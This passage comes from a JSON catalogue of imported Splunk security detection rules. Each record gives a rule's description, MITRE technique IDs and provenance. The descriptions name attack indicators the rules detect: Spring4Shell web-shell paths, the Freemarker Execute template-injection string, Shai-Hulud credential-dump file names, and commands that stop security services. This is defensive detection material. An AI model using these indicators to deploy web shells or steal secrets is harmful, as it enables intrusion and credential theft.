"source": "splunk/security_content", "source_id": "9cf8fe08-7ad8-11eb-9819-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/eventvwr_uac_bypass.yml" } }, { "id": "splunk-security-content-9d22a780-5165-11ec-ad4f-3e22fbd008af", "type": "detection", "name": "Randomly Generated Scheduled Task Name", "description": "The following analytic detects the creation of a Scheduled Task with a high entropy, randomly generated name, leveraging Event ID 4698. It uses the `ut_shannon` function from the URL ToolBox Splunk application to measure the entropy of the Task Name. This activity is significant as adversaries often use randomly named Scheduled Tasks for lateral movement and remote code execution, employing tools like Impacket or CrackMapExec. If confirmed malicious, this could allow attackers to execute arbitrary code remotely, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/randomly-generated-scheduled-task-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d22a780-5165-11ec-ad4f-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/randomly_generated_scheduled_task_name.yml" } }, { "id": "splunk-security-content-9d44d649-7d67-4559-95c1-8022ff49420b", "type": "detection", "name": "Spring4Shell Payload URL Request", "description": "The following analytic detects attempts to exploit the Spring4Shell vulnerability (CVE-2022-22963) by identifying specific URL patterns associated with web shell payloads. It leverages web traffic data, focusing on HTTP GET requests with URLs containing indicators like \"tomcatwar.jsp,\" \"poc.jsp,\" and \"shell.jsp.\" This activity is significant as it suggests an attacker is trying to deploy a web shell, which can lead to remote code execution. If confirmed malicious, this could allow the attacker to gain persistent access, execute arbitrary commands, and potentially escalate privileges within the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spring4shell-payload-url-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d44d649-7d67-4559-95c1-8022ff49420b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/spring4shell_payload_url_request.yml" } }, { "id": "splunk-security-content-9d4fea43-9182-4c5a-ada8-13701fd5615d", "type": "detection", "name": "Azure AD Admin Consent Bypassed by Service Principal", "description": "The following analytic identifies instances where a service principal in Azure Active Directory assigns app roles without standard admin consent. It uses Entra ID logs from the `azure_monitor_aad` data source, focusing on the \"Add app role assignment to service principal\" operation. This detection is significant as it highlights potential bypasses of critical administrative consent processes, which could lead to unauthorized privileges being granted. If confirmed malicious, this activity could allow attackers to exploit automation to assign sensitive permissions without proper oversight, potentially compromising the security of the Azure AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-admin-consent-bypassed-by-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d4fea43-9182-4c5a-ada8-13701fd5615d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_admin_consent_bypassed_by_service_principal.yml" } }, { "id": "splunk-security-content-9d680775-84a6-4625-a8ea-8182b9427ce4", "type": "detection", "name": "MacOS Kextload Usage", "description": "Detects execution of the kextload command on macOS systems. The kextload utility is used to manually load kernel extensions (KEXTs) into the macOS kernel, which can introduce privileged code at the kernel level.\nWhile legitimate for driver installation and system administration, misuse may indicate attempts to install unauthorized, malicious, or persistence-enabling kernel extensions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-kextload-usage.yaml", "provenance": { "source": "splunk/security_content", "source_id": "9d680775-84a6-4625-a8ea-8182b9427ce4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_kextload_usage.yml" } }, { "id": "splunk-security-content-9d867448-2aff-4d07-876c-89409a752ff8", "type": "detection", "name": "Linux High Frequency Of File Deletion In Etc Folder", "description": "The following analytic detects a high frequency of file deletions in the /etc/ folder on Linux systems. It leverages the Endpoint.Filesystem data model to identify instances where 200 or more files are deleted within an hour, grouped by process name and process ID. This behavior is significant as it may indicate the presence of wiper malware, such as AcidRain, which aims to delete critical system files. If confirmed malicious, this activity could lead to severe system instability, data loss, and potential disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-high-frequency-of-file-deletion-in-etc-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d867448-2aff-4d07-876c-89409a752ff8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_high_frequency_of_file_deletion_in_etc_folder.yml" } }, { "id": "splunk-security-content-9d8f6e3f-39df-46d8-a9d4-96173edc501f", "type": "detection", "name": "Kubernetes Anomalous Inbound to Outbound Network IO Ratio", "description": "The following analytic identifies significant changes in network communication behavior within Kubernetes containers by examining the inbound to outbound network IO ratios. It leverages process metrics from an OTEL collector and Kubelet Stats Receiver, along with data from Splunk Observability Cloud. Anomalies are detected using a lookup table containing average and standard deviation values for network IO, triggering an event if the anomaly persists for over an hour. This activity is significant as it may indicate data exfiltration, command and control communication, or compromised container behavior. If confirmed malicious, it could lead to data breaches, service outages, and unauthorized access within the Kubernetes cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-inbound-to-outbound-network-io-ratio.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d8f6e3f-39df-46d8-a9d4-96173edc501f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_inbound_to_outbound_network_io_ratio.yml" } }, { "id": "splunk-security-content-9d911ce0-c3be-11eb-b177-acde48001122", "type": "detection", "name": "Wbemprox COM Object Execution", "description": "The following analytic detects a suspicious process loading a COM object from wbemprox.dll, fastprox.dll, or wbemcomn.dll. It leverages Sysmon EventCode 7 to identify instances where these DLLs are loaded by processes not typically associated with them, excluding known legitimate processes and directories. This activity is significant as it may indicate an attempt by threat actors to abuse COM objects for privilege escalation or evasion of detection mechanisms. If confirmed malicious, this could allow attackers to gain elevated privileges or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wbemprox-com-object-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d911ce0-c3be-11eb-b177-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wbemprox_com_object_execution.yml" } }, { "id": "splunk-security-content-9d96022e-6250-11ec-9a19-acde48001122", "type": "detection", "name": "Linux Setuid Using Setcap Utility", "description": "The following analytic detects the execution of the 'setcap' utility to enable the SUID bit on Linux systems. It leverages Endpoint Detection and Response (EDR) data, focusing on process names and command-line arguments that indicate the use of 'setcap' with specific capabilities. This activity is significant because setting the SUID bit allows a user to temporarily gain root access, posing a substantial security risk. If confirmed malicious, an attacker could escalate privileges, execute arbitrary commands with elevated permissions, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-setuid-using-setcap-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9d96022e-6250-11ec-9a19-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_setuid_using_setcap_utility.yml" } }, { "id": "splunk-security-content-9db0d5b0-4058-4cb7-baaf-77d8143539a2", "type": "detection", "name": "O365 OAuth App Mailbox Access via Graph API", "description": "The following analytic detects when emails are accessed in Office 365 Exchange via the Microsoft Graph API using the client ID '00000003-0000-0000-c000-000000000000'. It leverages the 'MailItemsAccessed' operation within the Exchange workload, focusing on OAuth-authenticated applications. This activity is significant as unauthorized access to emails can lead to data breaches and information theft. If confirmed malicious, attackers could exfiltrate sensitive information, compromise user accounts, and further infiltrate the organization's network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-oauth-app-mailbox-access-via-graph-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9db0d5b0-4058-4cb7-baaf-77d8143539a2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_oauth_app_mailbox_access_via_graph_api.yml" } }, { "id": "splunk-security-content-9ddfe470-c4d0-4e60-8668-7337bd699edd", "type": "detection", "name": "Linux Auditd Clipboard Data Copy", "description": "The following analytic detects the use of the Linux 'xclip' command to copy data from the clipboard. It leverages Linux Auditd telemetry, focusing on process names and command-line arguments related to clipboard operations. This activity is significant because adversaries can exploit clipboard data to capture sensitive information such as passwords or IP addresses. If confirmed malicious, this technique could lead to unauthorized data exfiltration, compromising sensitive information and potentially aiding further attacks within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-clipboard-data-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9ddfe470-c4d0-4e60-8668-7337bd699edd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_clipboard_data_copy.yml" } }, { "id": "splunk-security-content-9e5726fe-8fde-460e-bd74-cddcf6c86113", "type": "detection", "name": "VMware Workspace ONE Freemarker Server-side Template Injection", "description": "The following analytic detects server-side template injection attempts related to CVE-2022-22954 in VMware Workspace ONE.\nIt leverages web or proxy logs to identify HTTP GET requests to the endpoint catalog-portal/ui/oauth/verify with the freemarker.template.utility.Execute command.\nThis activity is significant as it indicates potential exploitation attempts that could lead to remote code execution.\nIf confirmed malicious, an attacker could execute arbitrary commands on the server, leading to full system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/vmware-workspace-one-freemarker-server-side-template-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e5726fe-8fde-460e-bd74-cddcf6c86113", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/vmware_workspace_one_freemarker_server_side_template_injection.yml" } }, { "id": "splunk-security-content-9e7bd7c8-1c08-496e-9ffe-fd84ceb322e7", "type": "detection", "name": "Windows Gdrive Binary Activity", "description": "The following analytic detects the execution of the 'gdrive' tool on a Windows host. This tool allows standard users to perform tasks associated with Google Drive via the command line. This is used by actors to stage tools as well as exfiltrate data. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. If confirmed malicious, this could lead to compromise of systems or sensitive data being stolen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-gdrive-binary-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e7bd7c8-1c08-496e-9ffe-fd84ceb322e7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_gdrive_binary_activity.yml" } }, { "id": "splunk-security-content-9e7d3c0f-4a5b-6c8d-1e2f-3a4b5c6d7e8f", "type": "detection", "name": "Shai-Hulud 2 Exfiltration Artifact Files", "description": "Detects creation of exfiltration artifact files associated with Shai-Hulud 2.0 npm supply\nchain malware. The malware creates cloud.json, contents.json, environment.json, truffleSecrets.json,\nand actionsSecrets.json files containing harvested credentials from AWS, Azure, GCP, GitHub secrets,\nand environment variables. These files are staged before being pushed to attacker-controlled repositories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001", "T1552.001", "T1195.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/shai-hulud-2-exfiltration-artifact-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e7d3c0f-4a5b-6c8d-1e2f-3a4b5c6d7e8f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/shai_hulud_2_exfiltration_artifact_files.yml" } }, { "id": "splunk-security-content-9e995d21-6870-43de-acd9-76f372bcf323", "type": "detection", "name": "Cisco Secure Firewall - Oracle E-Business Suite Correlation", "description": "This correlation rule identifies potential exploitation attempts of Oracle E-Business Suite vulnerabilities (CVE-2025-61882 and CVE-2025-61884) by correlating multiple intrusion signatures from Cisco Secure Firewall Threat Defense logs.\nThe detection looks for specific signatures that indicate attempts to exploit the TemplatePreview functionality and vulnerable SyncServlet endpoints as well as post compromise activity involving Cl0p.\nBy correlating these signatures, the analytic aims to identify coordinated exploitation attempts that may indicate an attacker is targeting Oracle E-Business Suite installations.\nSecurity teams should investigate any instances of these correlated signatures, especially if they are found in conjunction with other suspicious network activity or on systems that should not be exposed to such threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-oracle-e-business-suite-correlation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e995d21-6870-43de-acd9-76f372bcf323", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___oracle_e_business_suite_correlation.yml" } }, { "id": "splunk-security-content-9e9ab4e3-c9d0-4967-a197-6d755e8a7e6e", "type": "detection", "name": "Windows Scheduled Task with Suspicious Name", "description": "The following analytic detects the creation, modification, or enabling of scheduled tasks with known suspicious or malicious task names. It leverages Windows Security EventCode 4698, 4700, and 4702 to identify when such tasks are registered, modified, or enabled. This activity is significant as it may indicate an attempt to establish persistence or execute malicious commands on a system. If confirmed malicious, this could allow an attacker to maintain access, execute arbitrary code, or escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-with-suspicious-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9e9ab4e3-c9d0-4967-a197-6d755e8a7e6e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_with_suspicious_name.yml" } }, { "id": "splunk-security-content-9ed27cea-4e27-4eff-b2c6-aac9e78a7517", "type": "detection", "name": "Windows Attempt To Stop Security Service", "description": "The following analytic detects attempts to stop security-related services on an endpoint, which may indicate malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for processes involving the \"sc.exe\" or \"net.exe\" command with the \"stop\" parameter or the PowerShell \"Stop-Service\" cmdlet. This activity is significant because disabling security services can undermine the organization's security posture, potentially leading to unauthorized access, data exfiltration, or further attacks like malware installation or privilege escalation. If confirmed malicious, this behavior could compromise the endpoint and the entire network, necessitating immediate investigation and response.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-attempt-to-stop-security-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9ed27cea-4e27-4eff-b2c6-aac9e78a7517", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_attempt_to_stop_security_service.yml" } }, { "id": "splunk-security-content-9f2295a0-0dcb-4a5f-b013-8a6f2a3c11f6", "type": "detection", "name": "Cisco Secure Firewall - High Volume of Intrusion Events Per Host", "description": "The following analytic detects internal systems that generate an unusually high volume of intrusion detections within a 30-minute window. It leverages Cisco Secure Firewall Threat Defense logs, specifically focusing on the IntrusionEvent event type, to identify hosts that trigger more than 15 Snort-based signatures during that time. A sudden spike in intrusion alerts originating from a single host may indicate suspicious or malicious activity such as malware execution, command-and-control communication, vulnerability scanning, or lateral movement. In some cases, this behavior may also be caused by misconfigured or outdated software repeatedly tripping detection rules. Systems exhibiting this pattern should be triaged promptly, as repeated Snort rule matches from a single source are often early indicators of compromise, persistence, or active exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1071", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-high-volume-of-intrusion-events-per-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9f2295a0-0dcb-4a5f-b013-8a6f2a3c11f6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___high_volume_of_intrusion_events_per_host.yml" } }, { "id": "splunk-security-content-9f2b7b1d-6c2f-4f2d-9a8b-8a1d7c5f2e11", "type": "detection", "name": "Cisco Isovalent - Non Allowlisted Image Use", "description": "The following analytic detects use of container images that fall outside an approved\nallowlist, leveraging Cisco Isovalent/Tetragon runtime telemetry (image name and\nworkload identity). Adversaries commonly introduce untrusted or newly published\nimages to deploy tooling, establish persistence, or abuse supply\u2011chain trust. This\nbehavior may indicate image pulls from unauthorized registries, execution of\nunvetted software, or a drift from established deployment baselines. Extra scrutiny\nis warranted for namespaces and workloads that normally source images from restricted\nregistries, and for pods that suddenly begin running images outside expected\nprefixes.\nMaintain an environment\u2011specific allowlist via the macro `cisco_isovalent_allowed_images`\n(for example, allow trusted registries/prefixes such as ImageName=\"gcr.io/org/*\",\n\"registry.local/*\", or \"myco/*\") and keep it updated as new baseline images are\nintroduced. This analytic alerts on images NOT matching the allowlist.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-non-allowlisted-image-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9f2b7b1d-6c2f-4f2d-9a8b-8a1d7c5f2e11", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___non_allowlisted_image_use.yml" } }, { "id": "splunk-security-content-9f306e0a-1c36-469e-8892-968ca12470dd", "type": "detection", "name": "Linux Auditd At Application Execution", "description": "The following analytic detects the execution of the \"At\" application in Linux, which can be used by attackers to create persistence entries on a compromised host. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent process names associated with \"at\" or \"atd\". This activity is significant because the \"At\" application can be exploited to maintain unauthorized access or deliver additional malicious payloads. If confirmed malicious, this behavior could lead to data theft, ransomware attacks, or other severe consequences. Immediate investigation is required to determine the legitimacy of the execution and mitigate potential risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-at-application-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9f306e0a-1c36-469e-8892-968ca12470dd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_at_application_execution.yml" } }, { "id": "splunk-security-content-9f31aa8e-e37c-46bc-bce1-8b3be646d026", "type": "detection", "name": "Detect AWS Console Login by User from New Region", "description": "The following analytic identifies AWS console login attempts by users from a new region. It leverages AWS CloudTrail events and compares current login regions against a baseline of previously seen regions for each user. This activity is significant as it may indicate unauthorized access attempts or compromised credentials. If confirmed malicious, an attacker could gain unauthorized access to AWS resources, potentially leading to data breaches, resource manipulation, or further lateral movement within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1535", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-aws-console-login-by-user-from-new-region.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9f31aa8e-e37c-46bc-bce1-8b3be646d026", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_aws_console_login_by_user_from_new_region.yml" } }, { "id": "splunk-security-content-9fb562f4-42f8-4139-8e11-a82edf7ed718", "type": "detection", "name": "Remote System Discovery with Dsquery", "description": "The following analytic detects the execution of `dsquery.exe` with the `computer` argument, which is used to discover remote systems within a domain. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Remote system discovery is significant as it indicates potential reconnaissance activities by adversaries or Red Teams to map out network resources and Active Directory structures. If confirmed malicious, this activity could lead to further exploitation, lateral movement, and unauthorized access to critical systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-system-discovery-with-dsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9fb562f4-42f8-4139-8e11-a82edf7ed718", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_system_discovery_with_dsquery.yml" } }, { "id": "splunk-security-content-9fcb214a-dc42-4ce7-a650-f1d2cab16a6a", "type": "detection", "name": "PaperCut NG Remote Web Access Attempt", "description": "The following analytic detects potential exploitation attempts on publicly accessible PaperCut NG servers.\nIt identifies connections from public IP addresses to the server, specifically monitoring URI paths commonly used in proof-of-concept scripts for exploiting PaperCut NG vulnerabilities.\nThis detection leverages web traffic data from the `Web` datamodel, focusing on specific URI paths and excluding internal IP ranges.\nThis activity is significant as it may indicate an attempt to exploit known vulnerabilities in PaperCut NG, potentially leading to unauthorized access or control of the server.\nIf confirmed malicious, attackers could gain administrative access, leading to data breaches or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/papercut-ng-remote-web-access-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9fcb214a-dc42-4ce7-a650-f1d2cab16a6a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/papercut_ng_remote_web_access_attempt.yml" } }, { "id": "splunk-security-content-9fdbf709-4c46-4819-9fb6-98b2d72059ed", "type": "detection", "name": "Zoom Rare Audio Devices", "description": "Detects rare audio devices from Zoom logs. Actors performing Remote Employment Fraud (REF) typically use unusual device information compared to a majority of employees. Detecting this activity requires careful analysis, regular review, and a thorough understanding of the audio and video devices commonly used within your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zoom-rare-audio-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9fdbf709-4c46-4819-9fb6-98b2d72059ed", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/zoom_rare_audio_devices.yml" } }, { "id": "splunk-security-content-9ff4ca95-fdae-4eea-9ffa-6d8e1c202a71", "type": "detection", "name": "GitHub Organizations Repository Deleted", "description": "The following analytic identifies when a repository is deleted within a GitHub organization. The detection monitors GitHub Organizations audit logs for repository deletion events by tracking actor details, repository information, and associated metadata. This behavior is concerning for SOC teams as malicious actors may attempt 